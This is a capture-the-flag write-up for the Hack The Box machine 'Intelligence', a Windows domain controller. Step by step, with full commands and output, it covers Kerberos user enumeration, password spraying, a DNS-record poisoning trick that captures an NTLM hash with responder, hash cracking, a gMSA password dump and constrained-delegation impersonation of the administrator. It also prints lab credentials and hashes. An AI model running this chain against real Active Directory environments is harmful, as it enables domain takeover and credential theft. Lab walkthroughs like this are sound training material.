Intelligence - Medium

Introduction@Intelligence:~$

Name	Intelligence
IP	10.10.10.248
Points	30
OS	Window
Difficulty	Medium
Creator	Micah
Release Date	03 Jul 2021

Enumeration

Nmap

# Nmap 7.92 scan initiated Thu Sep 23 15:19:45 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.35s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-09-23 16:05:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h15m00s, deviation: 0s, median: 7h15m00s
| smb2-time: 
|   date: 2021-09-23T16:06:11
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 23 15:21:50 2021 -- 1 IP address (1 host up) scanned in 125.17 seconds

Nmap show a lot of services running on the machine, LDAP , Kerberos, HTTP, SMB and others. We also have hostname and virtual host in the nmap output. Add them to /etc/hosts file.

Web Enumeration

There are two pdf to download. Inside both files are not interesting but if we lookup meta data of the two file, we can see creator name.

Save in a file and let's check these two user are valid or not.

┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ cat users 
William.Lee
Jose.Williams
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ ./kerbrute_linux_amd64 userenum users -d intelligence.htb --dc intelligence.htb

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 11/27/21 - Ronnie Flathers @ropnop

2021/11/27 10:53:09 >  Using KDC(s):
2021/11/27 10:53:09 >   intelligence.htb:88

2021/11/27 10:53:10 >  [+] VALID USERNAME:       William.Lee@intelligence.htb
2021/11/27 10:53:10 >  [+] VALID USERNAME:       Jose.Williams@intelligence.htb
2021/11/27 10:53:10 >  Done! Tested 2 usernames (2 valid) in 0.337 seconds

Both accounts are valid. Now try to query the domain for users with Do not require Kerberos pre-authentication set and export their TGTs for cracking.

┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py intelligence.htb/ -usersfile users 
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User William.Lee doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jose.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set

Both accounts have not set to Do not require pre-auth. This mean, we can't perform Kerberoasting attack, it requires a user with Pre-Authentication enabled.

Now look at the name of PDF files, we can see a pattern. 2020-01-01-upload.pdf

It's just a date and we can generate list of dates and bruteforce for other pdf files.

Getting PDF Files

generate_dates.sh

#!/bin/bash
start=2020-1-2
end=2022-01-01

while ! [[ $start > $end ]]; do
  echo $start
  start=$(date -d "$start + 1 day" +%F)
done

This script can generate dates 2020 to 2022. Now we need to concat that dates with -upload.pdf and save in a file named as file_name.txt

./generate_date.sh > dates.txt && cat dates.txt | while read line; do echo ${line}$string-upload.pdf; done > file_name.txt

file_name.txt output

2020-1-2-upload.pdf
2020-01-03-upload.pdf
2020-01-04-upload.pdf
2020-01-05-upload.pdf
2020-01-06-upload.pdf
2020-01-07-upload.pdf
---[snip]---

The next step is to bruteforce with that file using ffuf to know which pdf file is exists.

└──╼ [??]$ ffuf -w file_name.txt -mc 200 -u http://intelligence.htb/documents/FUZZ -s -o output -of md
2020-01-23-upload.pdf
2020-01-20-upload.pdf
2020-01-22-upload.pdf
2020-02-17-upload.pdf
2020-02-28-upload.pdf
---[snip]---

I used markdown format as output because we can grep easily that format with awk command. You can see ouput in below.

└──╼ [??]$ cat output                                                                                                                                                 
# FFUF Report                                                                                                                                                         
                                                                                                                                                                      
  Command line : `ffuf -w file_name.txt -mc 200 -u http://intelligence.htb/documents/FUZZ -s -o output -of md`                                                        
  Time: 2021-11-27T11:57:15+06:30                                                                                                                                 
                                                                                                                                                                      
  | FUZZ | URL | Redirectlocation | Position | Status Code | Content Length | Content Words | Content Lines | Content Type | ResultFile |                             
  | :- | :-- | :--------------- | :---- | :------- | :---------- | :------------- | :------------ | :--------- | :----------- |                                       
  | 2020-01-23-upload.pdf | http://intelligence.htb/documents/2020-01-23-upload.pdf |  | 22 | 200 | 11557 | 167 | 136 | application/pdf |  |                          
  | 2020-01-20-upload.pdf | http://intelligence.htb/documents/2020-01-20-upload.pdf |  | 19 | 200 | 11632 | 157 | 127 | application/pdf |  |
  | 2020-01-22-upload.pdf | http://intelligence.htb/documents/2020-01-22-upload.pdf |  | 21 | 200 | 28637 | 236 | 224 | application/pdf |  |
  | 2020-02-17-upload.pdf | http://intelligence.htb/documents/2020-02-17-upload.pdf |  | 47 | 200 | 11228 | 167 | 132 | application/pdf |  |
  | 2020-02-28-upload.pdf | http://intelligence.htb/documents/2020-02-28-upload.pdf |  | 58 | 200 | 11543 | 167 | 131 | application/pdf |  |
  | 2020-01-25-upload.pdf | http://intelligence.htb/documents/2020-01-25-upload.pdf |  | 24 | 200 | 26252 | 225 | 193 | application/pdf |  |
  | 2020-02-11-upload.pdf | http://intelligence.htb/documents/2020-02-11-upload.pdf |  | 41 | 200 | 25245 | 241 | 198 | application/pdf |  |

We only need the urls from the forth field, I used awk to grep that urls and saved in a file.

└──╼ [??]$ cat output | awk '{print $4}' > urls.txt    
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]  
└──╼ [??]$ cat urls.txt                                                            
http://intelligence.htb/documents/2020-01-23-upload.pdf
http://intelligence.htb/documents/2020-01-20-upload.pdf
http://intelligence.htb/documents/2020-01-22-upload.pdf
http://intelligence.htb/documents/2020-02-17-upload.pdf
http://intelligence.htb/documents/2020-02-28-upload.pdf
---[snip]---

Now we can use wget to download all pdf in urls file.

wget -i urls.txt -q

Now we get all the pdf and let's grep the creators name for all pdf.

┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ exiftool *.pdf | grep 'Creator' | awk '{print $3}' | sort -u             
Anita.Roberts    
Brian.Baker
Brian.Morris     
Daniel.Shelton
Danny.Matthews
Darryl.Harris 
David.Mcbride
---[snip]---

Save all username in a file and check again which users are valid.

./kerbrute_linux_amd64 userenum users.txt -d intelligence.htb --dc intelligence.htb

All 30 accounts are valid.I checked which account is set Do not require Kerberos pre-authentication but unfortunately even one account is not set.

Enumerating in PDF

When I grep some password in pdf, I see this.

┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ pdfgrep "pass" *.pdf
2020-06-04-upload.pdf:Please login using your username and the default password of:
2020-06-04-upload.pdf:After logging in please change your password as soon as possible.

In another pdf, I also found this

It tell us about a script which is placed by Ted user. They are in the process of locking down in service accounts.

Now we have the password and multiple user. We should try to perform Password Spraying attack on all users with the new password we got.

crackmapexec smb intelligence.htb -u users.txt -p 'NewIntelligenceCorpUser9876' --shares

We got one user valid with that password and we can also access shared folder of that user.

smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Mon Apr 19 07:50:26 2021
  ..                                 DR        0  Mon Apr 19 07:50:26 2021
  Administrator                       D        0  Mon Apr 19 06:48:39 2021
  All Users                       DHSrn        0  Sat Sep 15 13:51:46 2018
  Default                           DHR        0  Mon Apr 19 08:47:40 2021
  Default User                    DHSrn        0  Sat Sep 15 13:51:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 13:41:27 2018
  Public                             DR        0  Mon Apr 19 06:48:39 2021
  Ted.Graves                          D        0  Mon Apr 19 07:50:26 2021
  Tiffany.Molina                      D        0  Mon Apr 19 07:21:46 2021

                3770367 blocks of size 4096. 1390125 blocks available
smb: \> 

In Tiffany’s directory we can find the user flag.

smb: \Tiffany.Molina\Desktop\> more user.txt
cc107e8830f*********f6f1e4795d69a6b

Privilege Escalation

In IT share folder

┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ smbclient \\\\intelligence.htb\\IT -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Apr 19 07:20:55 2021
  ..                                  D        0  Mon Apr 19 07:20:55 2021
  downdetector.ps1                    A     1046  Mon Apr 19 07:20:55 2021
get
                3770367 blocks of size 4096. 1390093 blocks available
smb: \> get downdetector.ps1 
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> 

We will get a powershell file

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

It look like kind of cronjob running every 5min. It check for DNS records locally and if any of these records start with web then it will request the DNS record via HTTP request using current user’s credentials (probably Ted). If the response code is not 200 (OK) then it will send an email to Ted user mentioning that the host (DNS) is down.

If we map a DNS record to our own host (IP) and when the HTTP request is made to check the status of the DNS then we will receive a request (because our IP is mapped with that DNS) and in turn then we can send NTLM authentication request back to the IP address.So if we can add a dns in the record we can get the Ted.Graves hash using responder.

To add a DNS record we will use dnstool.py

┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/krbrelayx]
└──╼ [??]$ python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'weboops.intelligence.htb' -d 10.10.14.35 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/home/sheinn101/htb/intelligence/writeup/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully

Now our DNS is in record. Run responder and wait about 5 min, we will get Ted.Graves hash in responder.

sudo responder -I tun0 -A 

responder

[+] Listening for events...

[HTTP] NTLMv2 Client   : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:9b02c16f450e2d04:3EC5029EFAF4F6A9549E1373517E9FB8:0101000000000000AC62D441C8E3D7012544620B7670C8A90000000002000800520054003300520001001E00570049004E002D00350046003500520037005600450047005300340045000400140052005400330052002E004C004F00430041004C0003003400570049004E002D00350046003500520037005600450047005300340045002E0052005400330052002E004C004F00430041004C000500140052005400330052002E004C004F00430041004C0008003000300000000000000000000000002000009161CE8EA47C7454AD3A3E579DFD855C95ABEF4724213C1E2E924695B8E76A8B0A0010000000000000000000000000000000000009003A0048005400540050002F007700650062006F006F00700073002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

Now we get the hash and crack with john.

┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/krbrelayx]
└──╼ [??]$ john hash --wordlist=/opt/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy         (Ted.Graves)
1g 0:00:00:09 DONE (2021-11-27 18:29) 0.1075g/s 1162Kp/s 1162Kc/s 1162KC/s Mrz.deltasigma..Morgant1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

We got the password of Ted user. Now we can try the gMSADumper to read the password of svc_int (service account).

└──╼ [??]$ python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 'dc.intelligence.htb'
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::b98d4cef68f72a98dfeed732d1b1abca

Now we have the hash, I tried to crack to get the password but unfortunately I didn't get anything.

Getting Silver Ticket

Let’s use pass the hash technique to impersonate administrator and get the silver ticket. To generate silver ticket we need one more thing, that is SPN (Service Principle Name).

SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.

We will use bloodhound tool to dump AD environment to find the SPN.

┌─[sheinn101@parrot]─[/opt/BloodHound.py]
└──╼ [??]$ python3 bloodhound.py -u Ted.Graves -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c All
INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 42 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The DNS query name does not exist: svc_int.intelligence.htb.
INFO: Done in 01M 24S

It dump all the information in json format. We are looking for SPN, it should have in computers.json file.

└──╼ [??]$ cat 20211127184623_computers.json | json                                
{                                                                                  
  "computers": [                                                                   
    {                                                                                                                                                                 
      "ObjectIdentifier": "S-1-5-21-4210132550-3389855604-3437519686-1144",                                                                                           
      "AllowedToAct": [],                                                                                                                                             
      "PrimaryGroupSid": "S-1-5-21-4210132550-3389855604-3437519686-515",                                                                                             
      "LocalAdmins": [],                                                                                                                                              
      "PSRemoteUsers": [],                                                                                                                                            
      "Properties": {                                                                                                                                                 
        "name": "SVC_INT.INTELLIGENCE.HTB",                                                                                                                           
        "objectid": "S-1-5-21-4210132550-3389855604-3437519686-1144",                                                                                                 
        "domain": "INTELLIGENCE.HTB",                                                                                                                                 
        "highvalue": false,                                                                                                                                           
        "distinguishedname": "CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb",                                                                         
        "unconstraineddelegation": false,                                                                                                                             
        "enabled": true,                                                                                                                                              
        "haslaps": false,                                                                                                                                             
        "lastlogontimestamp": -1,                                                                                                                                     
        "pwdlastset": 1638043891,                                                                                                                                     
        "serviceprincipalnames": [],                                                                                                                                  
        "description": null,                                                                                                                                          
        "operatingsystem": null,                                                                                                                                      
        "allowedtodelegate": [                                                                                                                                        
          "WWW/dc.intelligence.htb"                                                                                                                                   
        ]                                                                                                                                                             
      },

As you can see the last line, svc_int is allowed to delegate with WWW/dc.intelligence.htb . Now we can able to get the silver ticket.

┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/getST.py -hashes :b98d4cef68f72a98dfeed732d1b1abca -spn WWW/dc.intelligence.htb -impersonate administrator intelligence.htb/svc_int$
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

We get an error because TGT’s are time constraint. We need to match our time with servers time.

sudo ntpdate 10.10.10.248

┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/getST.py -hashes :b98d4cef68f72a98dfeed732d1b1abca -spn WWW/dc.intelligence.htb -impersonate administrator intelligence.htb/svc_int$
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in administrator.ccach

We got the silver ticket and it is saved in current directory.

export KRB5CCNAME=`pwd`/administrator.ccache

Export the saved ticket, so that Kerberos clients can use it.

┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/smbclient.py intelligence.htb/administrator@dc.intelligence.htb -no-pass -k
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Type help for list of commands
# who
host:   \\10.10.14.35, user: administrator, active:     3, idle:     0
# shares
ADMIN$
C$
IPC$
IT
NETLOGON
SYSVOL
Users
# use Users
# ls
drw-rw-rw-          0  Mon Apr 19 07:50:26 2021 .
drw-rw-rw-          0  Mon Apr 19 07:50:26 2021 ..
drw-rw-rw-          0  Mon Apr 19 06:48:39 2021 Administrator
drw-rw-rw-          0  Mon Apr 19 09:46:30 2021 All Users
drw-rw-rw-          0  Mon Apr 19 08:47:40 2021 Default
drw-rw-rw-          0  Mon Apr 19 09:46:30 2021 Default User
-rw-rw-rw-        174  Mon Apr 19 09:45:17 2021 desktop.ini
drw-rw-rw-          0  Mon Apr 19 06:48:39 2021 Public
drw-rw-rw-          0  Mon Apr 19 07:50:26 2021 Ted.Graves
drw-rw-rw-          0  Mon Apr 19 07:21:46 2021 Tiffany.Molina
# cd Administrator
# cd Desktop
# ls
drw-rw-rw-          0  Mon Apr 19 07:21:57 2021 .
drw-rw-rw-          0  Mon Apr 19 07:21:57 2021 ..
-rw-rw-rw-        282  Mon Apr 19 07:10:10 2021 desktop.ini
-rw-rw-rw-         34  Sat Nov 27 13:07:38 2021 root.txt
# get root.txt
# exit
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ ls
2020-01-01-upload.pdf  2020-12-15-upload.pdf  administrator.ccache  kerbrute_linux_amd64  krbrelayx  pdf  root.txt  users
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ cat root.txt 
bf3bbe85e74********02d3aea9ed5b57

Now we pwned it.

https://app.hackthebox.com/profile/237587

Resource

https://github.com/dirkjanm/krbrelayx

https://adsecurity.org/?p=2011

https://github.com/micahvandeusen/gMSADumper

https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64